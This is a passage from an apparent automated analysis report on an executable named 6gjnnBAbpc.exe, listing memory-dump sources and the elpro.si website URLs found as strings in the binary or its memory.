6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/t
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kontakt/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/moj-racun/lost-password/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/neustrezna-izbira-izvedbe-termoelementov-dejanski-problem-slovenskega-predelova
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/splosni-prodajni-pogoji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/piskotki/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpora/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/analiza-plinov/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/ex/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/kalibracija/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/monitoring/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/nivo/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/prenosno/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/regulacija/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperatura/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/tlak/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 